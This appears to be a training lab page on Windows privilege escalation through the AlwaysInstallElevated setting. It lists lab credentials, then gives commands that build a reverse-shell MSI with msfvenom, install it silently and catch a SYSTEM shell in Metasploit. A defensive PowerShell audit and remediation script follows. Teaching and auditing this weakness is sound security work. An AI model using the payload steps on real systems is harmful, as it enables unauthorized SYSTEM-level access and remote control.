🪟 Windows Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Windows privilege escalation techniques. Start as a low-privilege user and escalate to SYSTEM or Administrator.
Lab Credentials: ram / pracivo  |  alice / alice123  |  administrator / Admin@2024 (goal: escalate to this)

AlwaysInstallElevated

PRIVILEGE ESCALATION
# If the AlwaysInstallElevated value is set to 1 under both HKLM and HKCU, any user can install an MSI package with SYSTEM privileges

# Step 1: Check registry
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both must return 0x1 for this to work

# Step 2: Create malicious MSI with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f msi -o evil.msi

# Step 3: Install the MSI — runs as SYSTEM
msiexec /quiet /qn /i evil.msi

# Step 4: Catch the shell in Metasploit
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST 10.10.10.1
set LPORT 4444
run
# Shell received as NT AUTHORITY\SYSTEM

# Automated check with PowerUp:
Get-RegistryAlwaysInstallElevated
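
Defender-side counterpart to the Step 1 check, as an added example that is not part of the lab material: a PowerShell audit that reads the HKLM value and the same value in every loaded user hive under HKEY_USERS (HKCU shows only the calling user), with an optional reset to 0. The function names and the -Remediate switch are hypothetical.

```powershell
# Added audit example (not from the lab). Function and switch names are
# hypothetical. Run elevated so other users' loaded hives are readable.
$SubKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
$Name   = 'AlwaysInstallElevated'

function Get-AieValue {
    param([string]$RegPath)
    # Returns the DWORD value, or $null when the key or value is absent.
    $item = Get-ItemProperty -Path $RegPath -Name $Name -ErrorAction SilentlyContinue
    if ($null -ne $item) { return [int]$item.$Name }
    return $null
}

function Test-AlwaysInstallElevated {
    param([switch]$Remediate)

    $machinePath = "Registry::HKEY_LOCAL_MACHINE\$SubKey"
    $machine = Get-AieValue $machinePath

    # HKCU only reflects the caller, so enumerate every loaded user hive.
    # The regex keeps account SIDs and skips the *_Classes hives.
    $userHives = Get-ChildItem 'Registry::HKEY_USERS' |
        Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' }

    foreach ($hive in $userHives) {
        $userPath = "Registry::HKEY_USERS\$($hive.PSChildName)\$SubKey"
        $user = Get-AieValue $userPath
        # The policy takes effect only when BOTH values equal 1.
        $exposed = ($machine -eq 1) -and ($user -eq 1)
        [pscustomobject]@{
            Sid = $hive.PSChildName; HKLM = $machine; HKU = $user; Exposed = $exposed
        }
        if ($exposed -and $Remediate) {
            Set-ItemProperty -Path $userPath -Name $Name -Value 0 -Type DWord
        }
    }
    # Reset the machine-wide value last so every row reports the original state.
    if ($machine -eq 1 -and $Remediate) {
        Set-ItemProperty -Path $machinePath -Name $Name -Value 0 -Type DWord
    }
}

Test-AlwaysInstallElevated | Format-Table -AutoSize
```

Hives of users who are not logged on are not loaded under HKEY_USERS, so they do not appear in the output. If the values are delivered by Group Policy ("Always install with elevated privileges" under both Computer and User Configuration), disable the setting there, since a local reset is overwritten at the next policy refresh.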